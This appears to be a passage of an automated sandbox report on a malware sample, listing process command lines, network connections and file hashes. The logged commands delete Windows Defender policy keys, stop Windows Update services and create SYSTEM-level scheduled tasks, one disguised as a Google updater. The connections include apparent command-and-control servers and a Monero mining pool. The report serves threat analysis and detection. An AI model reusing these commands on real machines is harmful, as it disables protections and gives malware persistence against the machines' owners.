cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\bWlzgM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\ucUuRll.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ztlTbPYifermRZH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ztlTbPYifermRZH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\kvnvOro.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\obLKYhY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\PSUhcLe.xml" /RU "SYSTEM"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\oLySDfI.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 00:22:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\eOnZcghK\dUUvmRC.dll\",#1 /Aqsite_idnbu 385119" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "HKFMMLmWpeGdwIqGl"

\??\c:\windows\system32\rundll32.EXE

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\eOnZcghK\dUUvmRC.dll",#1 /Aqsite_idnbu 385119

C:\Windows\SysWOW64\rundll32.exe

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\eOnZcghK\dUUvmRC.dll",#1 /Aqsite_idnbu 385119

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network

Country Destination Domain Proto
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
GB 216.58.208.118:443 i.ytimg.com tcp
GB 216.58.208.118:443 i.ytimg.com tcp
US 8.8.8.8:53 45.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 118.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.35:443 facebook.com tcp
US 8.8.8.8:53 15.201.240.157.in-addr.arpa udp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.35:443 facebook.com tcp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
NL 157.240.201.35:443 fbsbx.com tcp
NL 157.240.201.35:443 fbsbx.com tcp
US 8.8.8.8:53 96.134.101.95.in-addr.arpa udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 52.168.117.173:443 watson.telemetry.microsoft.com tcp
US 52.168.117.173:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 173.117.168.52.in-addr.arpa udp
GB 216.58.208.118:443 i.ytimg.com tcp
GB 216.58.208.118:443 i.ytimg.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 52.168.117.173:443 watson.telemetry.microsoft.com tcp
US 52.168.117.173:443 watson.telemetry.microsoft.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
TR 185.216.70.222:80 tcp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
FI 77.91.124.86:19084 tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 8.8.8.8:53 watson.telemetry.microsoft.com udp
US 104.208.16.94:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 94.16.208.104.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 104.208.16.94:443 watson.telemetry.microsoft.com tcp
US 104.208.16.94:443 watson.telemetry.microsoft.com tcp
US 8.8.8.8:53 105.134.101.95.in-addr.arpa udp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 59.82.57.23.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 88.221.24.41:443 www.bing.com tcp
NL 88.221.24.41:443 www.bing.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 41.24.221.88.in-addr.arpa udp
NL 194.169.175.235:42691 tcp
US 8.8.8.8:53 235.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.34:80 host-host-file8.com tcp
US 8.8.8.8:53 34.26.214.95.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 44682cfd-dbf3-4d53-905b-228741c6dc8d.uuid.allstatsin.ru udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun4.l.google.com udp
US 8.8.8.8:53 server7.allstatsin.ru udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 74.125.204.127:19302 stun4.l.google.com udp
BG 185.82.216.104:443 server7.allstatsin.ru tcp
US 8.8.8.8:53 127.204.125.74.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.0:443 walkinglate.com tcp
US 8.8.8.8:53 104.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 9.175.53.84.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
NL 172.217.168.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
NL 142.251.36.1:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 238.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 server7.allstatsin.ru udp
BG 185.82.216.104:443 server7.allstatsin.ru tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 51.68.143.81:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 81.143.68.51.in-addr.arpa udp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 118.34.255.51.in-addr.arpa udp
US 8.8.8.8:53 api2.check-data.xyz udp
US 35.80.164.208:80 api2.check-data.xyz tcp
US 8.8.8.8:53 datasheet.fun udp
US 8.8.8.8:53 208.164.80.35.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
BG 185.82.216.104:443 server7.allstatsin.ru tcp
US 8.8.8.8:53 stun1.l.google.com udp
US 142.251.125.127:19302 stun1.l.google.com udp
US 8.8.8.8:53 127.125.251.142.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FR 51.159.66.125:53 dihquvd.info udp
BG 185.141.63.172:80 dihquvd.info tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.d.7.2.4.f.9.3.3.ip6.arpa udp
US 8.8.8.8:53 172.63.141.185.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
BG 185.141.63.172:80 dihquvd.info tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

MD5 ebbfdd3142cd932c64243266942df005
SHA1 db53a3b003df5acddf557eaf1f234d4b9a30925d
SHA256 ab352a642081b63b9dc26490ee837dbd75d05e84a82fe64c1e6d98824c6c3c04
SHA512 f12f85ca407c8c95e93ea82fd89eb4538da056bbfc814ce5e5ea660e159f57bdb4fd7fdc81d4b92e93176063617de8c31c5f0f99cb4145c989f1f35c74eef649

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

MD5 ebbfdd3142cd932c64243266942df005
SHA1 db53a3b003df5acddf557eaf1f234d4b9a30925d
SHA256 ab352a642081b63b9dc26490ee837dbd75d05e84a82fe64c1e6d98824c6c3c04
SHA512 f12f85ca407c8c95e93ea82fd89eb4538da056bbfc814ce5e5ea660e159f57bdb4fd7fdc81d4b92e93176063617de8c31c5f0f99cb4145c989f1f35c74eef649

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

MD5 b0eeae69b80888ff98dc8649c767b7d2
SHA1 ae98630ac50e7aaaa5d0fa7da72b52817ef39001
SHA256 d86f8ffa3cfb45b0ae5e143d2fd07e73e499e81fdf3761879030010e695abd6e
SHA512 79f83eb8877b939788d2694895fcac08886cb28bfa70e639a5312f15793fee4dd2e1f40b8f68a6abbdea46b49806b25dc1abf4aab0ef4f77bf23fe82abe62ae0

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

MD5 b0eeae69b80888ff98dc8649c767b7d2
SHA1 ae98630ac50e7aaaa5d0fa7da72b52817ef39001
SHA256 d86f8ffa3cfb45b0ae5e143d2fd07e73e499e81fdf3761879030010e695abd6e
SHA512 79f83eb8877b939788d2694895fcac08886cb28bfa70e639a5312f15793fee4dd2e1f40b8f68a6abbdea46b49806b25dc1abf4aab0ef4f77bf23fe82abe62ae0

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

MD5 243758911f0cc3ab8e68cab2f08352e1
SHA1 e565aa389fc39944e5480422aff8add698eac921
SHA256 7b4ac23836c12a2561af7be8a35bb1a0c710d2c625f4c84cf860a2a362b2333d
SHA512 4a0f4fb9758a3de8730ff8901bd6c131d7892499dd49875e109a0bf3e489fa085eb0c10e7701692efb945339bf33c1356679cb821b8995ad625dc08fb809dd5d

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

MD5 243758911f0cc3ab8e68cab2f08352e1
SHA1 e565aa389fc39944e5480422aff8add698eac921
SHA256 7b4ac23836c12a2561af7be8a35bb1a0c710d2c625f4c84cf860a2a362b2333d
SHA512 4a0f4fb9758a3de8730ff8901bd6c131d7892499dd49875e109a0bf3e489fa085eb0c10e7701692efb945339bf33c1356679cb821b8995ad625dc08fb809dd5d

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

MD5 00081a3830d97a88bd9640af4752d0fb
SHA1 2d9a67b149f1751c25695f69e51e213fb3dfe5bc
SHA256 cfcd5f938cffdaa06209d233883b4003a926884976ce0b8379ef87ce55694b28
SHA512 be91caf4dc8ca06a4cf6a2cc2b1cd46ce67dd1f50f64e21d7204c2a99246b0d3fce5a9689f459333ee8b13f22e41c61fadf3f6f268f23c1fc8711fb741bfdbd4

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

MD5 00081a3830d97a88bd9640af4752d0fb
SHA1 2d9a67b149f1751c25695f69e51e213fb3dfe5bc
SHA256 cfcd5f938cffdaa06209d233883b4003a926884976ce0b8379ef87ce55694b28
SHA512 be91caf4dc8ca06a4cf6a2cc2b1cd46ce67dd1f50f64e21d7204c2a99246b0d3fce5a9689f459333ee8b13f22e41c61fadf3f6f268f23c1fc8711fb741bfdbd4

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

MD5 29e9546e7fe835b413a5d65599213b53
SHA1 64d6d2eca4e197a390702a08b074c5ef6da2fa32
SHA256 d65b10dc2c1598935786fd0d562aaee9c9fc6b7d6f950da6de13db6686cab814
SHA512 e556877abd79052f3d3bc6175971001531f363745d396aa96302218cf11b4fc94980f946aae758ff14d8cc8af4d9dcb26503142e2d1cded2d21ab37ddc009658

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

MD5 29e9546e7fe835b413a5d65599213b53
SHA1 64d6d2eca4e197a390702a08b074c5ef6da2fa32
SHA256 d65b10dc2c1598935786fd0d562aaee9c9fc6b7d6f950da6de13db6686cab814
SHA512 e556877abd79052f3d3bc6175971001531f363745d396aa96302218cf11b4fc94980f946aae758ff14d8cc8af4d9dcb26503142e2d1cded2d21ab37ddc009658

memory/3120-35-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

MD5 9d21324168c3c2362fcf52cbfbb8f337
SHA1 86244bccc47c6a77cdcd3c89e2a5d5c6557bc531
SHA256 3078cf0f4279bc87894b07e7264f4c1fdf69103f0a0658179c6aaddf226bc6d6
SHA512 a3091b1c493056050da7982a20286776d65a99ea722c68144d7e7f8d82cf4148d5195e833527e55b19e103672c5775948d2a77b972f93ff7afca299766a3f6e3

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

MD5 9d21324168c3c2362fcf52cbfbb8f337
SHA1 86244bccc47c6a77cdcd3c89e2a5d5c6557bc531
SHA256 3078cf0f4279bc87894b07e7264f4c1fdf69103f0a0658179c6aaddf226bc6d6
SHA512 a3091b1c493056050da7982a20286776d65a99ea722c68144d7e7f8d82cf4148d5195e833527e55b19e103672c5775948d2a77b972f93ff7afca299766a3f6e3

memory/3120-41-0x00000000732E0000-0x00000000739CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

MD5 6296c10a63e82660fa617573334bc624
SHA1 5c7a43559032b3e693cdc5b92f3b6b58a4cf0313
SHA256 ab00c5349f537aa72c4357cb9fd2e0b30ecc59f6f3ae8830a6738ead9e3547ef
SHA512 9582e02fddb59e5f4ce80579cc73ebea6d6c37e1886fc3d27c517ea4828e7057da8c7e973255562b587573d6f53752b684f14a25cf280e3ce320027bac593ca0

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

MD5 6296c10a63e82660fa617573334bc624
SHA1 5c7a43559032b3e693cdc5b92f3b6b58a4cf0313
SHA256 ab00c5349f537aa72c4357cb9fd2e0b30ecc59f6f3ae8830a6738ead9e3547ef
SHA512 9582e02fddb59e5f4ce80579cc73ebea6d6c37e1886fc3d27c517ea4828e7057da8c7e973255562b587573d6f53752b684f14a25cf280e3ce320027bac593ca0

memory/1080-44-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1080-51-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3320-50-0x0000000000FA0000-0x0000000000FB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

MD5 73c0a9983b33575b4e66cd91f2e8778c
SHA1 49cce232b6b07b8789984646d8c5753ab7d0a534
SHA256 48f5b3c7e43089309550508a46e4854af5338ac6378b0cdbe84d6b8da251754f
SHA512 a9c6c567b9077ac4faa38909f4a594134aec27808e3949e7aff8454d1ab22e92f245d990327ab6bb3e31176cc14ef531aee51f0970318a6f0d22bffc7acbfb7f

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

MD5 73c0a9983b33575b4e66cd91f2e8778c
SHA1 49cce232b6b07b8789984646d8c5753ab7d0a534
SHA256 48f5b3c7e43089309550508a46e4854af5338ac6378b0cdbe84d6b8da251754f
SHA512 a9c6c567b9077ac4faa38909f4a594134aec27808e3949e7aff8454d1ab22e92f245d990327ab6bb3e31176cc14ef531aee51f0970318a6f0d22bffc7acbfb7f

memory/2940-61-0x0000000000400000-0x000000000043E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 945b3260eb11be98187c7def50510674
SHA1 15338cc329d91e2a9f6bc1e1a82db5213ff1247e
SHA256 4be628a8638030f47a996ae951eb5eda962fc1d9dc2c53dc603e49807e1a2e20
SHA512 d5993bd7c4900d021f2cb69878c0dc4c55f39dcecbf05d3e4785da69924a2b7973ceaba70a097fa4dbcae156c0b83a63d5004d23938527384f65a580d0e3ee71

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

MD5 945b3260eb11be98187c7def50510674
SHA1 15338cc329d91e2a9f6bc1e1a82db5213ff1247e
SHA256 4be628a8638030f47a996ae951eb5eda962fc1d9dc2c53dc603e49807e1a2e20
SHA512 d5993bd7c4900d021f2cb69878c0dc4c55f39dcecbf05d3e4785da69924a2b7973ceaba70a097fa4dbcae156c0b83a63d5004d23938527384f65a580d0e3ee71

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

MD5 945b3260eb11be98187c7def50510674
SHA1 15338cc329d91e2a9f6bc1e1a82db5213ff1247e
SHA256 4be628a8638030f47a996ae951eb5eda962fc1d9dc2c53dc603e49807e1a2e20
SHA512 d5993bd7c4900d021f2cb69878c0dc4c55f39dcecbf05d3e4785da69924a2b7973ceaba70a097fa4dbcae156c0b83a63d5004d23938527384f65a580d0e3ee71

memory/2940-70-0x00000000732E0000-0x00000000739CE000-memory.dmp

memory/2940-71-0x000000000BBC0000-0x000000000C0BE000-memory.dmp

memory/2940-72-0x000000000B760000-0x000000000B7F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 945b3260eb11be98187c7def50510674
SHA1 15338cc329d91e2a9f6bc1e1a82db5213ff1247e
SHA256 4be628a8638030f47a996ae951eb5eda962fc1d9dc2c53dc603e49807e1a2e20
SHA512 d5993bd7c4900d021f2cb69878c0dc4c55f39dcecbf05d3e4785da69924a2b7973ceaba70a097fa4dbcae156c0b83a63d5004d23938527384f65a580d0e3ee71

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 945b3260eb11be98187c7def50510674
SHA1 15338cc329d91e2a9f6bc1e1a82db5213ff1247e
SHA256 4be628a8638030f47a996ae951eb5eda962fc1d9dc2c53dc603e49807e1a2e20
SHA512 d5993bd7c4900d021f2cb69878c0dc4c55f39dcecbf05d3e4785da69924a2b7973ceaba70a097fa4dbcae156c0b83a63d5004d23938527384f65a580d0e3ee71

memory/2940-78-0x000000000B710000-0x000000000B71A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

MD5 54a5f52dfb5a0dabc2b6335af42e1719
SHA1 76aca91248877769d0be7445b5fdda7d5ab55add
SHA256 cadc96c04a508787bf1b23225238fe445e4794468323b5d765e2ffc41b46d38f
SHA512 abff717aee6c4248adecb5467ccc66ef39983e32771e4b08cc033d7aade45234318edaafabb2acb0c1aa701e1e6eef3dd2128c1734dfbf241a96d9459e774f9b

memory/3120-81-0x00000000732E0000-0x00000000739CE000-memory.dmp

memory/4200-82-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

MD5 54a5f52dfb5a0dabc2b6335af42e1719
SHA1 76aca91248877769d0be7445b5fdda7d5ab55add
SHA256 cadc96c04a508787bf1b23225238fe445e4794468323b5d765e2ffc41b46d38f
SHA512 abff717aee6c4248adecb5467ccc66ef39983e32771e4b08cc033d7aade45234318edaafabb2acb0c1aa701e1e6eef3dd2128c1734dfbf241a96d9459e774f9b

memory/2940-84-0x000000000C6D0000-0x000000000CCD6000-memory.dmp

memory/2940-85-0x000000000BA30000-0x000000000BB3A000-memory.dmp

memory/2940-86-0x000000000B960000-0x000000000B972000-memory.dmp

memory/2940-87-0x000000000B9C0000-0x000000000B9FE000-memory.dmp

memory/2940-88-0x000000000BB40000-0x000000000BB8B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ED00.tmp\ED10.tmp\ED11.bat

MD5 dec89e5682445d71376896eac0d62d8b
SHA1 c5ae3197d3c2faf3dea137719c804ab215022ea6
SHA256 c3dea90ca98985007f0de66bf0197fdcd2d4a35e365135bf37a18a4895d81668
SHA512 b746b79120d2ff8a9f3327b0bed99c70339155ea831c1eb9f412056fc8de36a0e3005378ba9102bd25ce6cc24fe1171f1a9c8453f33a9bcd6dd59e9ad0f8e186

memory/3728-99-0x000002374CA20000-0x000002374CA30000-memory.dmp

memory/3120-119-0x00000000732E0000-0x00000000739CE000-memory.dmp

memory/3728-126-0x000002374CE00000-0x000002374CE10000-memory.dmp

memory/3728-145-0x000002374D0A0000-0x000002374D0A2000-memory.dmp

memory/4200-149-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

